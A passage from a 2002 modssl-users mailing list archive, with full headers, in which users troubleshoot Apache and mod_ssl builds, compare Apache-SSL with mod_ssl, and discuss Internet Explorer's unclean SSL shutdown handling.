for ice cream"; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 17:13:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA16518; Wed, 23 Jan 2002 17:12:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id RAA16491; Wed, 23 Jan 2002 17:11:04 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id RAA19386 for ; Wed, 23 Jan 2002 17:11:03 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma019380; Wed, 23 Jan 02 17:11:02 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id RAA13758 for ; Wed, 23 Jan 2002 17:11:01 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id RAA20645 for ; Wed, 23 Jan 2002 17:11:01 +0100 (MET) Message-ID: <3C4EE095.2A266A00@bourse.ch> Date: Wed, 23 Jan 2002 17:11:01 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Apache and Mod_SSL References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users "Julian C. Dunn" wrote: > > If I'm not mistaken mod-ssl is derived from Apache-SSL. I don't know what the > main differences are. Apache-SSL is the original. It is an expansion of the apache source-code to include SSL functionality. When you compile Apache_SSL, you get a monolithic binary which can do SSL if required. If you don't require SSL, you don't need to use it (obviously) but the binary can't be made smaller. mod_ssl is indeed derived from Apache-SSL and is two things: - an extension to the apache API to allow the hook-in of an SSL module - an SSL module for apache. The difference is that you now can load SSL functionality via DSO, much as you dynamically load any other module. Having said that, a lot of people compile-in mod_ssl... As far as I am aware (having used both of them) there is no functional difference. I would venture that mod_ssl is easier to install and it could be that the support is better but that's asking for trouble... Rgds, Owen Boyle ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 17:51:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA17994; Wed, 23 Jan 2002 17:50:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from photon.wildfalcon.com id RAA17976; Wed, 23 Jan 2002 17:49:41 +0100 (MET) Received: (qmail 9197 invoked by uid 500); 23 Jan 2002 17:50:28 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 23 Jan 2002 17:50:28 -0000 Date: Wed, 23 Jan 2002 17:50:28 +0000 (GMT) From: Laurie Young To: "'modssl-users@modssl.org'" Subject: RE: Apache 2 + SSL Problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Laurie Young X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I tried using the default files, and still had the same problem even thoguh the ssl_engine.log was cliaming everythign is ok I ahve now gone back to apache 1.3.22 and got it working Laurie On Tue, 22 Jan 2002, MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1) wrote: > Hi Laurie, > To eliminate any confusion regarding configuration, can you pl. use > the standard httpd.conf and the ssl.conf that's installed when 2.0.28 is > installed.. The only extra thing you'll have to do is to create the > certificate.. Incase you don't have any previousely created certs., you can > use the attached script to generate dummy certs. Pl. note that this script > is derived off Ralf's original script - let me know if you run into > problems.. (to get help, just type "./mkcert.sh").. > BTW, I believe you have to explicitly tell the server to listen on > 443. > > -Madhu > > > -----Original Message----- > From: Laurie Young [mailto:laurie@wildfalcon.com] > Sent: Tuesday, January 22, 2002 4:47 AM > To: 'modssl-users@modssl.org' > Subject: Re: Apache 2 + SSL Problems > > > On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > > > Hi Laurie! > > On Tue, 22 Jan 2002, Laurie Young wrote: > > > > > I have tried starting it with > > > ./apachectrl start > > > and with > > > ./apachectrl startssl > > > > > > both give the same errors > > > > > > It would be good if someone could have a look at my httpd.config file, > > > which I have included as an attachment > > > > > I don't remember if you said how did you compiled the SSL support (deleted > > the mesgs) was it as a loadable module? If so, add a LoadModule directive, > > cause: > > I had some problems with DSO (apxs insisted on producing .la files instead > of .dso files) so I gave up on that and compilied modssl into the main > apache binary > > > > > > > PidFile logs/httpd.pid > > > Timeout 300 > > > Listen 8080 > > > Listen 443 > > ....^ you listen on 443 either mod_ssl is loaded or not. > > I wasn't sure if I had to explicitly tel the server to listen to 443. Do > I? > > > > > > > > > > .................^ virtual host where sslengine is on sais a different IP > > than what you've tried from command line (namely 127.0.0.1 aka localhost). > > 146.169.4.13 is the real world IP for the machine I am running on, I have > tried connecting to localhost, 127.0.0.1, 146.169.3.14 and > stone.doc.ic.ac.uk (the FQDN of the host) but all have the same error ;-( > > > Laurie > > -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 18:31:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA21106; Wed, 23 Jan 2002 18:30:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from UberGeek.coremetrics.com id SAA21082; Wed, 23 Jan 2002 18:29:57 +0100 (MET) Received: (from austin@localhost) by UberGeek.coremetrics.com (8.11.6/8.11.6) id g0NHTmo07374; Wed, 23 Jan 2002 11:29:48 -0600 X-Authentication-Warning: UberGeek.coremetrics.com: austin set sender to austin@coremetrics.com using -f Subject: RE: Apache 2 + SSL Problems From: Austin Gonyou To: modssl-users@modssl.org In-Reply-To: References: Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-H+HfTHN4+CmEkGrtD+0J" X-Mailer: Evolution/1.0.1 Date: 23 Jan 2002 11:29:48 -0600 Message-Id: <1011806988.7360.1.camel@UberGeek> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Austin Gonyou X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-H+HfTHN4+CmEkGrtD+0J Content-Type: text/plain Content-Transfer-Encoding: quoted-printable What version of Apache 2 were you using? On Wed, 2002-01-23 at 11:50, Laurie Young wrote: >=20 > I tried using the default files, and still had the same problem even > thoguh the ssl_engine.log was cliaming everythign is ok >=20 > I ahve now gone back to apache 1.3.22 and got it working >=20 > Laurie >=20 >=20 >=20 > On Tue, 22 Jan 2002, MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1) wrote: >=20 > > Hi Laurie, > > To eliminate any confusion regarding configuration, can you pl. > use > > the standard httpd.conf and the ssl.conf that's installed when 2.0.28 > is > > installed.. The only extra thing you'll have to do is to create the > > certificate.. Incase you don't have any previousely created certs., > you can > > use the attached script to generate dummy certs. Pl. note that this > script > > is derived off Ralf's original script - let me know if you run into > > problems.. (to get help, just type "./mkcert.sh").. > > BTW, I believe you have to explicitly tell the server to listen > on > > 443. > > > > -Madhu > > > > > > -----Original Message----- > > From: Laurie Young [mailto:laurie@wildfalcon.com] > > Sent: Tuesday, January 22, 2002 4:47 AM > > To: 'modssl-users@modssl.org' > > Subject: Re: Apache 2 + SSL Problems > > > > > > On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > > > > > Hi Laurie! > > > On Tue, 22 Jan 2002, Laurie Young wrote: > > > > > > > I have tried starting it with > > > > ./apachectrl start > > > > and with > > > > ./apachectrl startssl > > > > > > > > both give the same errors > > > > > > > > It would be good if someone could have a look at my httpd.config > file, > > > > which I have included as an attachment > > > > > > > I don't remember if you said how did you compiled the SSL support > (deleted > > > the mesgs) was it as a loadable module? If so, add a LoadModule > directive, > > > cause: > > > > I had some problems with DSO (apxs insisted on producing .la files > instead > > of .dso files) so I gave up on that and compilied modssl into the main > > apache binary > > > > > > > > > > > PidFile logs/httpd.pid > > > > Timeout 300 > > > > Listen 8080 > > > > Listen 443 > > > ....^ you listen on 443 either mod_ssl is loaded or not. > > > > I wasn't sure if I had to explicitly tel the server to listen to 443. > Do > > I? > > > > > > > > > > > > > > > > .................^ virtual host where sslengine is on sais a > different IP > > > than what you've tried from command line (namely 127.0.0.1 aka > localhost). > > > > 146.169.4.13 is the real world IP for the machine I am running on, I > have > > tried connecting to localhost, 127.0.0.1, 146.169.3.14 and > > stone.doc.ic.ac.uk (the FQDN of the host) but all have the same error > ;-( > > > > > > Laurie > > > > >=20 > --=20 > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D > Laurie Robert Young > laurie@wildfalcon.com | laurie@doc.ic.ac.uk > www.wildfalcon.com | www.doc.ic.ac.uk/~laurie > ICQ UIN #20194782 > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D >=20 > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org --=20 Austin Gonyou Systems Architect, CCNA Coremetrics, Inc. Phone: 512-698-7250 email: austin@coremetrics.com "It is the part of a good shepherd to shear his flock, not to skin it." Latin Proverb --=-H+HfTHN4+CmEkGrtD+0J Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8TvMM94g6ZVmFMoIRAqEFAJ9WRCgNVX/s+5+4MJSgV+qyupn3OQCg4OnI VBFu2YncWq0eRxUwe/nlEhg= =rG6g -----END PGP SIGNATURE----- --=-H+HfTHN4+CmEkGrtD+0J-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 18:55:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA22073; Wed, 23 Jan 2002 18:54:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta6.snfc21.pbi.net id SAA22046; Wed, 23 Jan 2002 18:53:41 +0100 (MET) Received: from christopher.tokpela.com ([63.200.61.35]) by mta6.snfc21.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GQE007W5KDEHA@mta6.snfc21.pbi.net> for modssl-users@modssl.org; Wed, 23 Jan 2002 09:53:39 -0800 (PST) Date: Wed, 23 Jan 2002 09:51:15 -0800 From: Christopher Taranto Subject: Re[2]: Apache and Mod_SSL In-reply-to: <20020123103652.11563.qmail@web20401.mail.yahoo.com> X-Sender: efaqs.com/christopher@opal.he.net To: Eduardo Fresno Cc: modssl-users@modssl.org Message-id: <4.3.2.7.2.20020123094803.04b3c910@opal.he.net> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Content-type: text/plain; charset=iso-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA22070 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Christopher Taranto X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Eduardo, I don't have any experience installing mod_ssl on a windows platform but I do have experience using nmake which is a Microsoft version of make that was released with the Windows NT Resource kit. You can download it here: http://download.microsoft.com/download/vc15/Patch/1.52/W95/EN-US/Nmake15.exe I hope this helps. Sincerely, Christopher Taranto At 11:36 AM 1/23/02 +0100, you wrote: >Hi Christopher, > >I've seen your messages about Apache and Mod_SSL in >the internet and I was wondering if you could help me >on this issue. > >I'm trying to make Apache a secure server by adding >SSL performance. There may exist two main ways to do >it: >1) Mod_SSL >2) Apache-SSL > >I've tried out the first option, but during the >process, I've been asked for the 'nmake' compiler. I >don't have this compiler and I don't want to pay for >it, as I think it is provided with Visual C++ ($$$). > >So I was wondering if there exist another way to make >it. ?? > >If not, I'm thinking about using Apache-SSL instead of >Mod_SSL, in spite of the fact that most people may >prefer Mod_SSL. > >Is it worth using Apache-SSL instead of Mod_SSL? >I mean, are there big differences between both two >options? Which one is the best? > > >Thanks in advance, > >-- >Edd. > >_______________________________________________________________ >Do You Yahoo!? >Yahoo! Messenger >Comunicación instantánea gratis con tu gente. >http://messenger.yahoo.es ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 19:16:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA23266; Wed, 23 Jan 2002 19:15:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from d101.x-mailer.de id TAA23239; Wed, 23 Jan 2002 19:14:27 +0100 (MET) Received: from [127.0.0.1] (helo=there) by d101.x-mailer.de with smtp (Exim 3.33 #3) id 16TRjs-0001Ax-00; Wed, 23 Jan 2002 19:03:12 +0100 Content-Type: text/plain; charset="iso-8859-1" From: Andreas Gietl To: modssl-users@modssl.org Subject: strange problem with unclean shutdown Date: Wed, 23 Jan 2002 19:12:35 +0100 X-Mailer: KMail [version 1.3.2] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andreas Gietl X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi, i've got a really really strange problem with mod_ssl 2.8.5-1.3.22 on Apache 1.3.22 with openssl 0.9.6c. As we all know MSIE needs the unclean-shutdown to sucessfully work with mod_ssl. This is why we add the SetEnvIf for this Browser. (full vhost-config see below). The strange thing is that this for some reason seems not to match IE 5.01 and 5.5. This are the user-agent for these browsers: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DT) Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; DT) Versions > 6 worked. Others not tested. The certificate is issued let's say for www.defaulthost.de. And not it is really getting unbelievable: if i connect to defaulhost.de it's doing the unclean-shutdown and to www.defaulhost.de it is doing a standard-shutdown, which does not work. Connecting to www.defaulhost.de does give the ie standard-error-page. There's no HTTP-Request in the access_log, just in the SSLLog an entry that it connected and quited with standard shutdown. Any ideas? Andreas Here's the config: # # Global SSL # AddType application/x-x509-ca-cert .cer AddType application/x-pkcs7-crl .crl #SSLPassPhraseDialog builtin SSLSessionCache dbm:/tmp/ssl_scache SSLSessionCacheTimeout 100 #SSLMutex file:domlogs/ssl_mutex #SSLRandomSeed startup builtin #SSLRandomSeed connect builtin #SSLLog domlogs/ssl_engine_log #SSLLogLevel debug # SSL - Virtual-Host ServerName www.defaulthost.de ServerAdmin webmaster@defaulthost.de DocumentRoot /home/defaulthost/public_html SSLEngine on SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL ErrorLog domlogs/defaulthost.errors.https CustomLog domlogs/defaulthost.de.ssl combined SetEnvIf User-Agent "MSIE" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 CustomLog domlogs/defaulthost.de.ssl_request_log \ "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" SSLCertificateFile /usr/local/apache/conf/cert/www.defaulthost.de.cer SSLCertificateKeyFile /usr/local/apache/conf/cert/www.defaulthost.de.key ScriptAlias /cgi-bin/ /home/defaulhost/public_html/cgi-bin/ -- e-admin internet gmbh Andreas Gietl Roter-Brach-Weg 124a tel +49 941 3810884 fax +49 941 3810891 mobil +49 171 6070008 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 19:53:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA24745; Wed, 23 Jan 2002 19:52:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bubblehouse.divisionbyzero.com id TAA24711; Wed, 23 Jan 2002 19:51:17 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by bubblehouse.divisionbyzero.com (Postfix) with ESMTP id 56E0E5BD86 for ; Wed, 23 Jan 2002 12:01:13 -0800 (PST) Subject: Re: strange problem with unclean shutdown From: jon schatz To: modssl-users@modssl.org In-Reply-To: References: Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-RPuuH6g82ayqSzg9o165" X-Mailer: Evolution/1.0 (Preview Release) Date: 23 Jan 2002 10:52:18 -0800 Message-Id: <1011811939.1018.0.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-RPuuH6g82ayqSzg9o165 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Wed, 2002-01-23 at 10:12, Andreas Gietl wrote: > i've got a really really strange problem with mod_ssl 2.8.5-1.3.22 on Apa= che=20 > 1.3.22 with openssl 0.9.6c. <---snip---> > This are the user-agent for these browsers: >=20 > Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DT) > Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; DT) >=20 This is the same problem i reported yesterday (to this list and apache-users). Check your logs; is apache aware of the User-Agent value when a ssl connection is made? In my particular setup, it wasn't (even though the value was set), and that caused the regex to fail.=20 -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-RPuuH6g82ayqSzg9o165 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8TwZiwj1gFegse14RApVhAJ9EDXxuFyTTa/98UT+q4pWIRds16QCfR7Gg hCdTU6XX3vk5jVvGZ6W0GeY= =IphM -----END PGP SIGNATURE----- --=-RPuuH6g82ayqSzg9o165-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 21:14:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA28407; Wed, 23 Jan 2002 21:13:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from d101.x-mailer.de id VAA28374; Wed, 23 Jan 2002 21:12:42 +0100 (MET) Received: from [127.0.0.1] (helo=there) by d101.x-mailer.de with smtp (Exim 3.33 #3) id 16TTaE-0005f6-00 for modssl-users@modssl.org; Wed, 23 Jan 2002 21:01:22 +0100 Content-Type: text/plain; charset="iso-8859-1" From: Andreas Gietl To: modssl-users@modssl.org Subject: Re: strange problem with unclean shutdown Date: Wed, 23 Jan 2002 21:10:46 +0100 X-Mailer: KMail [version 1.3.2] References: <1011811939.1018.0.camel@devotchka.sonicopia.com> In-Reply-To: <1011811939.1018.0.camel@devotchka.sonicopia.com> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andreas Gietl X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wednesday 23 January 2002 19:52, you wrote: uh - how did you fix this problem? I don't see any logentry in the ssl-access-log. > On Wed, 2002-01-23 at 10:12, Andreas Gietl wrote: > > i've got a really really strange problem with mod_ssl 2.8.5-1.3.22 on > > Apache 1.3.22 with openssl 0.9.6c. > > <---snip---> > > > This are the user-agent for these browsers: > > > > Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; DT) > > Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; DT) > > This is the same problem i reported yesterday (to this list and > apache-users). Check your logs; is apache aware of the User-Agent value > when a ssl connection is made? In my particular setup, it wasn't (even > though the value was set), and that caused the regex to fail. > > -jon -- e-admin internet gmbh Andreas Gietl Roter-Brach-Weg 124a tel +49 941 3810884 fax +49 941 3810891 mobil +49 171 6070008 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 21:46:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA29597; Wed, 23 Jan 2002 21:45:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bubblehouse.divisionbyzero.com id VAA29562; Wed, 23 Jan 2002 21:44:49 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by bubblehouse.divisionbyzero.com (Postfix) with ESMTP id AA4AA5BD86 for ; Wed, 23 Jan 2002 13:54:45 -0800 (PST) Subject: Re: strange problem with unclean shutdown From: jon schatz To: modssl-users@modssl.org In-Reply-To: References: <1011811939.1018.0.camel@devotchka.sonicopia.com> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-tj+C/Lnqbsi4PDsBYyhE" X-Mailer: Evolution/1.0 (Preview Release) Date: 23 Jan 2002 12:45:50 -0800 Message-Id: <1011818751.1018.8.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-tj+C/Lnqbsi4PDsBYyhE Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Wed, 2002-01-23 at 12:10, Andreas Gietl wrote: > uh - how did you fix this problem?=20 I haven't fixed it. I've gotten no feedback from either list (modssl-users and apache-users) on this, and i've found older reports in the apache bug db. so i'm not sure what to do. i've tried unconditionally setting the broken ssl variables like so: SetEnv nokeepalive SetEnv ssl-unclean-shutdown SetEnv downgrade-1.0=20 SetEnv force-response-1.0=20 inside of the ssl virtualhost container, but they're still being ignored, and the errors still show up in the log.=20 > I don't see any logentry in the ssl-access-log. Do you log user agents? i use this to log: LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined What's not being logged on my setup is the user-agent field... -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-tj+C/Lnqbsi4PDsBYyhE Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8TyD+wj1gFegse14RAjSJAJ9Nu+BiNcDpPh7iDE+9fDADryjukgCcCyXb b9m1gBar0Rz6xQFEt29Zssk= =syeT -----END PGP SIGNATURE----- --=-tj+C/Lnqbsi4PDsBYyhE-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 24 08:47:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA29172; Thu, 24 Jan 2002 08:46:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id IAA29121; Thu, 24 Jan 2002 08:45:15 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id C790D4CE749; Thu, 24 Jan 2002 08:45:13 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0O6Dmf13770; Thu, 24 Jan 2002 07:13:48 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from out016.verizon.net id DAA15777; Thu, 24 Jan 2002 03:34:19 +0100 (MET) Received: from hppav ([141.157.202.124]) by out016.verizon.net (InterMail vM.5.01.04.02 201-253-122-122-102-20011128) with ESMTP id <20020124023412.FWDD1294.out016.verizon.net@hppav> for ; Wed, 23 Jan 2002 20:34:12 -0600 From: "lin geng" To: Subject: RE: Apache and Mod_SSL Date: Wed, 23 Jan 2002 21:28:32 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <20020123105359.16015.qmail@web20401.mail.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "lin geng" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You can use cygwin and it comes with openssl compiled. Regards, Lin Geng -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of Eduardo Fresno Sent: Wednesday, January 23, 2002 5:54 AM To: modssl-users@modssl.org Subject: Apache and Mod_SSL Hi, I was wondering if you could help me on this issue. I'm trying to make Apache a secure server by adding SSL performance. There may exist two main ways to do it: 1) Mod_SSL 2) Apache-SSL I've tried out the first option, but during the process, I've been asked for the 'nmake' compiler. I don't have this compiler and I don't want to pay for it, as I think it is provided with Visual C++ ($$$). So I was wondering if there exist another way to make it. ?? If not, I'm thinking about using Apache-SSL instead of Mod_SSL, in spite of the fact that most people may prefer Mod_SSL. Is it worth using Apache-SSL instead of Mod_SSL? I mean, are there big differences between both two options? Which one is the best? Thanks in advance, -- Edd. _______________________________________________________________ Do You Yahoo!? Yahoo! Messenger Comunicación instantánea gratis con tu gente. http://messenger.yahoo.es ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Jan 24 10:09:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA03422; Thu, 24 Jan 2002 10:08:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from d101.x-mailer.de id KAA03403; Thu, 24 Jan 2002 10:07:58 +0100 (MET) Received: from [127.0.0.1] (helo=there) by d101.x-mailer.de with smtp (Exim 3.33 #3) id 16TfgN-0004p5-00 for modssl-users@modssl.org; Thu, 24 Jan 2002 09:56:31 +0100 Content-Type: text/plain; charset="iso-8859-1" From: Andreas Gietl To: modssl-users@modssl.org Subject: Re: strange problem with unclean shutdown Date: Thu, 24 Jan 2002 10:06:04 +0100 X-Mailer: KMail [version 1.3.2] References: <1011818751.1018.8.camel@devotchka.sonicopia.com> In-Reply-To: <1011818751.1018.8.camel@devotchka.sonicopia.com> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andreas Gietl X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Wednesday 23 January 2002 21:45, you wrote: I just tried apache-ssl and that one did not work either. > On Wed, 2002-01-23 at 12:10, Andreas Gietl wrote: > > uh - how did you fix this problem? > > I haven't fixed it. I've gotten no feedback from either list > (modssl-users and apache-users) on this, and i've found older reports in > the apache bug db. so i'm not sure what to do. i've tried > unconditionally setting the broken ssl variables like so: > > SetEnv nokeepalive > SetEnv ssl-unclean-shutdown > SetEnv downgrade-1.0 > SetEnv force-response-1.0 > > inside of the ssl virtualhost container, but they're still being > ignored, and the errors still show up in the log. > > > I don't see any logentry in the ssl-access-log. > > Do you log user agents? i use this to log: > > LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" > \"%{User-Agent}i\"" combined > > What's not being logged on my setup is the user-agent field... > > -jon -- e-admin internet gmbh Andreas Gietl Roter-Brach-Weg 124a tel +49 941 3810884 fax +49 941 3810891 mobil +49 171 